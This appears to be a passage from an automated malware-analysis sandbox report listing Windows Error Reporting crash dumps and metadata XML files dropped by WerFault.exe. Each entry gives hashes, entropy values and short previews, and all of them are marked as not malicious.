                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER730E.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:07 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):75690
                                                            Entropy (8bit):1.8798343028574518
                                                            Encrypted:false
                                                            SSDEEP:192:Ing5faUzLIOCoPzQzegxGyugdsvmNsZKEeEpPjK7HyH1+1SLs8leIYtLw45/jq/s:MgVaUXvPOtugdsvm2Gh45letwqGd0p
                                                            MD5:D2C8D8E28EFA2605993453FC88E01A3B
                                                            SHA1:073A45134BE02B471B295369629C31542358769A
                                                            SHA-256:DE29C0FE8E014D95B2BF2B39BDED27DC149138B542A56D03A83EC964AE099AC1
                                                            SHA-512:D86BB040E3007DCE77F4FCE9157DAACD1328183CDCEDA43189DC9DC1AD5306E4F37B68AAD346B4DECCB7942CFFE39382FA57E4E9213729E567071FE16582B449
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......g..g....................................T....7..........T.......8...........T............&..............T...........@...............................................................................eJ..............GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER737C.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.7066637191177354
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwk6u6Y9LSU9HAgmf6lpBa89bqbhsfTEjm:R6lXJT6u6YhSU9HAgmf6pqbafw6
                                                            MD5:EA6CA5F26F837E0291C47B4CEA1F862F
                                                            SHA1:2C36A7336F4BBA1EB6B452C3D0AFF0E32772BB5B
                                                            SHA-256:55C08A74807D73659497FCBA87E5E49B2B2956D2FBAA068FD5C400AF323642DA
                                                            SHA-512:C6C7830CB2FCFF38F59C7091FECE9AE24569B3D46675914435136B179DDC6965F80A3645B802C47B8DF17B8EDAD84BE9C9A036657D3F4A187ACD3B5002D68F14
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER73CB.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.590991764493244
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VY60Ym8M4Jmf/JFy+q8vD/bFjyIOIAd:uIjfKI7mC7VTBJ9KvVFhAd
                                                            MD5:83519463147326160E17650043766DAA
                                                            SHA1:A3ED6B0D532319A97CA17E6B3AF944EDA3694A0B
                                                            SHA-256:0DCE2439799469D9D86CF7E3EDEE5942A13072BB66F16BEA200CA7D3A4732585
                                                            SHA-512:B1F5863918C35126FCE94BC3C1AE385F427726E5D5C98713222C2FC8C464A3085C244FA85A5474D64200C7B86675B2CA376BA844376051F8C6D2062AA5A7ED37
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER75CD.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:07 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):88394
                                                            Entropy (8bit):2.0136232962211347
                                                            Encrypted:false
                                                            SSDEEP:384:Nhku4uYYbvl8i9sCL7uTLMrsSdX45leQ7HssrynKco68:7PzYwvl8i95CvSC8smK
                                                            MD5:86E605C3E93B5C14E03F691ADFE755BD
                                                            SHA1:A34B67EE4902CDB1EF03B5855F8C62E351866025
                                                            SHA-256:6D580CE1560B02F6CFC778B10DA31F24026B4D84280B7B845B19BA1327956C49
                                                            SHA-512:02E9D76ACDF77329BB4BD8EE1A00295C4C9257438D70B518D5361C20DFA1436A50BB7D34BE2FA321DD25D9D08212DFC53F413B3888FC4A3C8A91EF5EF295A64C
                                                            Malicious:false
                                                            Preview:MDMP..a..... .......g..g........................x...........4....<..........T.......8...........T...........8-...,..........4........... ...............................................................................eJ..............GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER767A.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8602
                                                            Entropy (8bit):3.707161061296225
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJww6V6Y99SU9H2gmf6lpBB89bqbhsf+Ejm:R6lXJX6V6YXSU9H2gmf60qbafZ6
                                                            MD5:C3E5C0C07B42A7D3D0691ABD008F6CEA
                                                            SHA1:09D3EF130315A3771B52AB7374A3237621D3B372
                                                            SHA-256:DB5C07936C912FFD0796E243B10CACA99F74807AF4A9A31138331E1EE6291B0B
                                                            SHA-512:EC2C0058E2319E01E22CA6FB3C9F548E23A8E1E9FD385A27D7C50599E04D3AE100D2688614487D4B467E85DE2BE4BF65F3719651726F7B126B63B8C0929C46E6
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER76B9.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4955
                                                            Entropy (8bit):4.591505303901703
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsMJg77aI9AMSWpW8VY5Ym8M4Jmf/JFzDX+q8vD/bFjyIOIAd:uIjfKI7mC7VtJuDXKvVFhAd
                                                            MD5:367FC9DA590307DDC999DF262A12349B
                                                            SHA1:B7170EDAF7915764C413AAF46C7BEA41389AB65D
                                                            SHA-256:755378B15809B86CAC07CE963EA587D895CFFBA4F5151943CD691C2D551846BC
                                                            SHA-512:ABC9705799A65F8B32467DE7E90FEA0736EC5E90BC138F99CB663897D2965056C1FCE3FA65728E7E7E19577FDE80CFD40481570D3798685F4084EE7C7988505B
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534190" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER76E.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:45 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):46228
                                                            Entropy (8bit):2.48674268037572
                                                            Encrypted:false
                                                            SSDEEP:192:alfkjIA77bcxVXep+N8OCo+QzUyBnD5Ki58C0K2m2ZyifSAMjcoq6gLxA:2MMA77Iip+Nzv+QzUyBo827ME4Xe
                                                            MD5:16A588E5032932986AD4CA2F501BCB6E
                                                            SHA1:4B80E470399CF598A162A81A92144AFD128707AD
                                                            SHA-256:E6F01BFF6A46A3E8856D4A815A46BF447D07A901C6DB6A7CB32D5290BBD4ADD6
                                                            SHA-512:2A697ABED06776D4D88AE831FF42793066016E4E8AAFC7459BC75EB2093C081D58FBB8DCF9AFA0B11C2C4B8170D20BDCDA49479CB39098856B905B2F055CB61A
                                                            Malicious:false
                                                            Preview:MDMP..a..... ..........g............4...........`...<.......d...0,..........T.......8...........T............:...y......................................................................................................eJ...... ......GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB09.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8666
                                                            Entropy (8bit):3.7032624876618576
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwql6Ixs6Y90SU9m9gmfXopN3q89bGhsf5tCm:R6lXJZ6Ixs6YeSU9m9gmfXYGaf55
                                                            MD5:9DC650DA6FD89A33576EEB45617CE397
                                                            SHA1:CD1426FC1EECD286B60AEDEC02C6941322E3BE94
                                                            SHA-256:7055A3B534F5B1EC4A442575F302782C50E83CD761B3C6A7ED97E43568CC03D4
                                                            SHA-512:4812BD9197AD3E9C68E4A05CB7F634DA988DEBDD2D37B96843CDAF3850A7F04E8B64EF6EC1A4150D6A4E3DF23EFBD3030BF8B908AF3D0ABDE03FA96F5241BFF6
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB49.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):5009
                                                            Entropy (8bit):4.594100313902978
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsbJg77aI9AMSWpW8VYH0Ym8M4Jmf/D6Fu+q8vD/DkFjyIOIRd:uIjf1I7mC7VwJ0KMVFhRd
                                                            MD5:B7602D15DD3ECEFA86AEF4693712F6B3
                                                            SHA1:9F96802F65054F2CF685AEEDEACD16DDAFBE9377
                                                            SHA-256:0397AB1920CFA8EE902C5B5EA43C6960951E8218AB41818C6F39D81B23E43ADC
                                                            SHA-512:C0561575C3D3CCFB9FF4698508B38F6170D685F05DFD7360341C38B8CB86B0307554EA118D94681FD4DDB5E2A019E376118FA5EFF49AA6525F0AFC7FA2DEB4D2
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534191" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC09C.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:09:32 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):42544
                                                            Entropy (8bit):2.546297475764115
                                                            Encrypted:false
                                                            SSDEEP:192:3KfkjIA77bcxVXepeUOCo+QzF9yBU5H5DK5KvRIT7ngRiMxA/fxpKW1KP:aMMA77Iipebv+QzF9yBrKvm8EMWfxp7A
                                                            MD5:15378252A028EEB7FB8D4875965C7D66
                                                            SHA1:D201CFA50BB23DEB21B1047CD4829AEAA2BBCB53
                                                            SHA-256:135368F4DAD1D2A3B5A32F4F7C8E1089461D1BA2F93FD264600A11AC659B8E23
                                                            SHA-512:C116A8CBE213E80B7C0254080E06634ECAAE9E49F1E8EF20F0A2A7E0C908309BEE36AF7DE7B9E101DAC3C5C446AD37C55B85FD6B0E6279547EA12EA18D6BC6C1
                                                            Malicious:false
                                                            Preview:MDMP..a..... ..........g............4...........`...<.......D...0,..........T.......8...........T............:..`k......................................................................................................eJ...... ......GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC2B1.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8604
                                                            Entropy (8bit):3.709692907122153
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwd6IxkS6Y9iSUTLgmfEkApDw89b/hsfR1m:R6lXJi6IxkS6YYSUTLgmfEr/afa
                                                            MD5:FADA1E858A46E7F0DBCA507E4ECFA62F
                                                            SHA1:973A5554E29E49B46FC4FA2B3DC31AD7BBBEB86F
                                                            SHA-256:006D46B05F088125B56014473BAE01B7DBB21B486E6FF46FBB2B18C57C5E5C61
                                                            SHA-512:302438BE0A15DA046ED6EBC40A3938D8ACD100DAB350958EBE8A490D358189D5C52DE424BF613D8A5555D2AFEDEE1D8E0DFC6F63A889B32F048D92A2CD487AC1
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC30F.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4908
                                                            Entropy (8bit):4.606858083532832
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsGJg77aI9AMSWpW8VYaYm8M4Jmf/DNFs+q8nPEAFjyIOIAd:uIjfcI7mC7VCJ9WVFhAd
                                                            MD5:BD04DDF749948B80646D5196A3E3EFE9
                                                            SHA1:A148EB83D63D6D9053ECDDFD2487C16F9FEB6980
                                                            SHA-256:66C1B4561DECFE61B309FFE6033FDFCD96BA9513588747D29E9C6E51D17D3AB3
                                                            SHA-512:284EFCDCCAFCBA022AECFE083ACF3C7B780EEF84EBD878E5C8DA5C8D0CAB396C7B95C1CF4EE0F19FCB647E2C3EFDC5E1C24C520DBB66CAD5EB27467C0E286F90
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534192" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD69.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:46 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):46028
                                                            Entropy (8bit):2.4515273193268174
                                                            Encrypted:false
                                                            SSDEEP:192:ljPfkjIA77bcxVXepLFtOCo+QzDoB2uD5w5Iz42ggwErpZ9Bz1g6pMVKE1wFG:RPMMA77IipLFgv+QzDoBW2XwEFxWkwqM
                                                            MD5:3FD357CCC4C32B40F26D6E73641AEFFB
                                                            SHA1:4EDBC0C18B7F7025C82D52EA3E2258C85B54BCC3
                                                            SHA-256:DF0279E21723433A9551AE241D935A417DE4DFC8EBDACDD2A40EFAB2978B4E13
                                                            SHA-512:DC311AC8C275690FBC7415807211E5489C090CCE6B4FE3079EBA5FC4AD277BFB1FC804E5D5E9B50BE32E03B6C82E5111A1095D9CA623DCDAF51EC77692072E34
                                                            Malicious:false
                                                            Preview:MDMP..a..... ..........g............4...........`...<.......T...0,..........T.......8...........T............:...x......................................................................................................eJ...... ......GenuineIntel............T.......P...^..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD8.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8548
                                                            Entropy (8bit):3.710523045758048
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwL6IxN6Y9nSU9gF9gmfPoprO89bdhsfHvfm:R6lXJ06IxN6Y9SU9m9gmfPKdafm
                                                            MD5:A7B1B4A374150083989DB346B85FF539
                                                            SHA1:FD4D65123748C0CA562601E5E8AB5CC9F810DF51
                                                            SHA-256:932768ECCE3A8EDF5481A9F550FC64917FE516601E059EF28D067A9ACCB86BC8
                                                            SHA-512:426CFD0AD085EB62013C586114B934A9CF17EDFBA20C81E059BBA96260C1D6CCD1AAF370E9DD957C631E8D8886CFEC6F7756B858AED55782FA875199EA955A67
                                                            Malicious:false
